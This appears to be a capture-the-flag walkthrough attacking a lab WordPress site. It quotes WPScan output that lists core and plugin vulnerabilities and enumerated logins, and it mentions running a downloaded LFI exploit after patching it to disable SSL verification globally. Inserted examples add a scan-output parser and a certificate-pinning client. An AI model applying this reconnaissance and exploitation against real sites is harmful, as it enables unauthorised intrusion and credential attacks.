[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses

   Reference: https://wpvulndb.com/vulnerabilities/8473
   Reference: https://codex.wordpress.org/Version_4.5
   Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029

[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings

   Reference: https://wpvulndb.com/vulnerabilities/8474
   Reference: https://codex.wordpress.org/Version_4.5
   Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634

[i] Fixed in: 4.5

[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF

   Reference: https://wpvulndb.com/vulnerabilities/8475
   Reference: https://codex.wordpress.org/Version_4.5
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635

[i] Fixed in: 4.5

[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8488
   Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
   Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
   Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567

[i] Fixed in: 4.5.2

[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)

   Reference: https://wpvulndb.com/vulnerabilities/8489
   Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
   Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
   Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
   Reference: http://avlidienbrunn.com/wp_some_loader.php
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566

[i] Fixed in: 4.2.8

[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS

   Reference: https://wpvulndb.com/vulnerabilities/8518
   Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
   Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834

[i] Fixed in: 4.2.9

[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure

   Reference: https://wpvulndb.com/vulnerabilities/8519
   Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
   Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
   Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835

[i] Fixed in: 4.2.9

[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post

   Reference: https://wpvulndb.com/vulnerabilities/8520
   Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
   Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837

[i] Fixed in: 4.2.9

[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename

   Reference: https://wpvulndb.com/vulnerabilities/8615
   Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
   Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
   Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
   Reference: http://seclists.org/fulldisclosure/2016/Sep/6
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168

[i] Fixed in: 4.2.10

[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader

   Reference: https://wpvulndb.com/vulnerabilities/8616
   Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
   Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169

[i] Fixed in: 4.2.10

[+] WordPress theme in use: bhost - v1.2.9

[+] Name: bhost - v1.2.9

|  Location: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/
|  Readme: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/readme.txt

[!] The version is out of date, the latest version is 1.3.3

|  Style URL: https://192.168.1.13:12380/blogblog/wp-content/themes/bhost/style.css
|  Theme Name: BHost
|  Theme URI: Author: Masum Billah
|  Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
|  Author: Masum Billah
|  Author URI: http://getmasum.net/

[+] Enumerating usernames ... [+] Identified the following 10 user/s:

   +----+---------+-----------------+
   | Id | Login   | Name            |
   +----+---------+-----------------+
   | 1  | john    | John Smith      |
   | 2  | elly    | Elly Jones      |
   | 3  | peter   | Peter Parker    |
   | 4  | barry   | Barry Atkins    |
   | 5  | heather | Heather Neville |
   | 6  | garry   | garry           |
   | 7  | harry   | harry           |
   | 8  | scott   | scott           |
   | 9  | kathy   | kathy           |
   | 10 | tim     | tim             |
   +----+---------+-----------------+


[+] Enumerating plugins from passive detection ... [+] No plugins found

[+] Enumerating all plugins (may take a while and use a lot of system resources) ...

  Time: 00:06:11 <=====================> (62804 / 62804) 100.00% Time: 00:06:11

[+] We found 4 plugins:

[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0

|  Latest version: 1.0 (up to date)
|  Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
|  Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

[+] Name: akismet

|  Latest version: 3.2 
|  Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8215
   Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
   Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html

[i] Fixed in: 3.1.5

[+] Name: shortcode-ui - v0.6.2

|  Latest version: 0.6.2 (up to date)
|  Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/
|  Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/

[+] Name: two-factor

|  Latest version: 0.1-dev-20160412 
|  Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/
|  Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/readme.txt

[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/


[+] Finished: Tue Oct 4 20:09:29 2016
[+] Requests Done: 37
[+] Memory used: 32.523 MB
[+] Elapsed time: 00:00:04

This is great! Not only did we find a ton of users (which seem to correlate to the names we found earlier) but we also found a few XSS vulnerabilities, a Path Traversal vulnerability and a few plugins that we can research for possible vulnerable entry points.
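Output of this length is easier to act on as structured data: which findings belong to core and which to a plugin, which CVEs they map to, and the lowest release that closes all of them. The script below is an added example, not part of the original walkthrough and not WPScan's own code. It parses a constructed sample that is a trimmed copy of the text output quoted above and assumes the legacy WPScan text layout exactly as printed there (`[!] Title:`, indented `Reference:` lines, `[i] Fixed in:`, `[+] Name:` blocks and the ASCII user table).

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of the WPScan text output quoted above.
SAMPLE_OUTPUT = """\
[!] Title: WordPress 3.7-4.4.1 - Open Redirect

   Reference: https://wpvulndb.com/vulnerabilities/8377
   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221

[i] Fixed in: 4.2.7

[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader

   Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169

[i] Fixed in: 4.2.10

[+] Enumerating usernames ... [+] Identified the following 10 user/s:

   +----+---------+-----------------+
   | Id | Login   | Name            |
   +----+---------+-----------------+
   | 1  | john    | John Smith      |
   | 6  | garry   | garry           |
   +----+---------+-----------------+

[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0

[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

[+] Name: akismet

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)

   Reference: https://wpvulndb.com/vulnerabilities/8215

[i] Fixed in: 3.1.5
"""


@dataclass
class Finding:
    component: str            # "WordPress" for core, otherwise the plugin/theme slug
    title: str
    cves: list = field(default_factory=list)
    fixed_in: str = ""        # empty when WPScan printed no fix version


@dataclass
class Report:
    findings: list = field(default_factory=list)
    users: list = field(default_factory=list)        # (id, login, display name)
    components: dict = field(default_factory=dict)   # slug -> version or "unknown"
    dir_listing: list = field(default_factory=list)  # URLs with listing enabled


TITLE_RE = re.compile(r"^\[!\] Title: (.+)$")
FIXED_RE = re.compile(r"^\[i\] Fixed in: (\S+)$")
NAME_RE = re.compile(r"^\[\+\] Name: (\S+)(?: - v(\S+))?$")
DIRLIST_RE = re.compile(r"^\[!\] Directory listing is enabled: (\S+)$")
USER_RE = re.compile(r"^\|\s*(\d+)\s*\|\s*(\S+)\s*\|\s*(.*?)\s*\|$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_wpscan(text):
    """Turn WPScan's legacy text output into a Report (layout assumed as shown above)."""
    report = Report()
    component = "WordPress"   # core findings are printed before any plugin/theme block
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if m := NAME_RE.match(line):
            component = m.group(1)
            report.components[component] = m.group(2) or "unknown"
            current = None
        elif m := TITLE_RE.match(line):
            current = Finding(component, m.group(1))
            report.findings.append(current)
        elif m := FIXED_RE.match(line):
            if current is not None:
                current.fixed_in = m.group(1)
        elif line.startswith("Reference:") and current is not None:
            for cve in CVE_RE.findall(line):
                if cve not in current.cves:
                    current.cves.append(cve)
        elif m := DIRLIST_RE.match(line):
            report.dir_listing.append(m.group(1))
        elif m := USER_RE.match(line):
            report.users.append((int(m.group(1)), m.group(2), m.group(3)))
    return report


def version_key(version):
    """Numeric sort key so that 4.2.10 ranks above 4.2.7 (plain string order gets this wrong)."""
    return tuple(int(p) for p in re.findall(r"\d+", version))


def minimum_upgrade(report, component="WordPress"):
    """Lowest release that closes every finding WPScan reported for one component."""
    fixed = [f.fixed_in for f in report.findings if f.component == component and f.fixed_in]
    return max(fixed, key=version_key) if fixed else None


def cves_for(report, component="WordPress"):
    return sorted({c for f in report.findings if f.component == component for c in f.cves})


if __name__ == "__main__":
    rep = parse_wpscan(SAMPLE_OUTPUT)
    for comp in ["WordPress"] + list(rep.components):
        print(f"{comp}: upgrade to {minimum_upgrade(rep, comp)}, CVEs {cves_for(rep, comp)}")
    print("enumerated logins:", [u[1] for u in rep.users])
    print("directory listing enabled:", rep.dir_listing)
```

Running it on the full scan output gives a per-component patch target plus the login list and the three plugin directories with listing enabled, which is the short list an administrator of the box would work from: upgrade core and Akismet, disable directory indexes, and watch the enumerated logins for password guessing.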

After doing some research, I found out that advanced-video-embed-embed-videos-or-playlists was vulnerable to an LFI exploit, which can be found here!

Upon downloading and running the exploit, I was presented with an SSL error, so I went ahead and edited the code to include the following:

 import ssl
 # replace urllib's default HTTPS context with one that skips certificate verification
 ssl._create_default_https_context = ssl._create_unverified_context

Once it ran successfully, I navigated to https://192.168.1.13:12380/blogblog/wp-content/uploads/ and was presented with a .jpeg file.
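The SSL error is expected: the lab box serves a self-signed certificate on port 12380, so no CA in the trust store vouches for it. The two-line patch above fixes that by overwriting a private attribute of the `ssl` module, which turns certificate checking off for every HTTPS connection the process makes. The following Python is an added example, not code from the exploit or from the walkthrough: it builds a TLS context for this one host and pins the certificate's SHA-256 fingerprint, so the first contact is trust-on-first-use but any later change of certificate is reported instead of silently accepted. The host and port are the walkthrough's; `record_pin`, `fetch_pinned` and the stored pin value are assumptions of this example.

```python
import hashlib
import http.client
import ssl


def normalize_fp(fp):
    """Accept 'BA:78:...' (openssl style) or bare hex and compare in one canonical form."""
    return fp.replace(":", "").lower()


def fingerprint_sha256(der_bytes):
    """Hex SHA-256 of a DER certificate, what `openssl x509 -noout -fingerprint -sha256` prints."""
    return hashlib.sha256(der_bytes).hexdigest()


def check_pin(der_bytes, expected_fp):
    """True only when a certificate was presented and it matches the recorded fingerprint."""
    if not der_bytes:
        return False
    return fingerprint_sha256(der_bytes) == normalize_fp(expected_fp)


def lab_context():
    """TLS context for one self-signed lab host, not a process-wide default.
    Chain and hostname checks are off because there is no CA and we connect by IP;
    the pin check in fetch_pinned() stands in for them."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def record_pin(host, port):
    """Trust-on-first-use: fetch the certificate once and return the fingerprint to store."""
    pem = ssl.get_server_certificate((host, port))
    return fingerprint_sha256(ssl.PEM_cert_to_DER_cert(pem))


def fetch_pinned(host, port, path, expected_fp):
    """GET path over TLS; abort before sending anything if the peer certificate changed."""
    conn = http.client.HTTPSConnection(host, port, context=lab_context(), timeout=10)
    try:
        conn.connect()
        der = conn.sock.getpeercert(binary_form=True)
        if not check_pin(der, expected_fp):
            seen = fingerprint_sha256(der) if der else "no certificate"
            raise ssl.SSLCertVerificationError(
                f"certificate pin mismatch for {host}:{port}: {seen}")
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


if __name__ == "__main__":
    # Host and port from the walkthrough; the pin is whatever record_pin() returned
    # the first time (assumed lab values, not taken from the original page).
    HOST, PORT = "192.168.1.13", 12380
    pin = record_pin(HOST, PORT)
    print("pinned", pin)
    status, body = fetch_pinned(HOST, PORT, "/robots.txt", pin)
    print(status, body.decode(errors="replace"))
```

`record_pin` is the one blind step; store its result and pass it to `fetch_pinned` on every later run. Nothing else in the interpreter loses certificate verification, and a different certificate on the same host and port (a rebuilt VM, or another machine answering for the address) fails closed with the fingerprint that was actually seen.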

References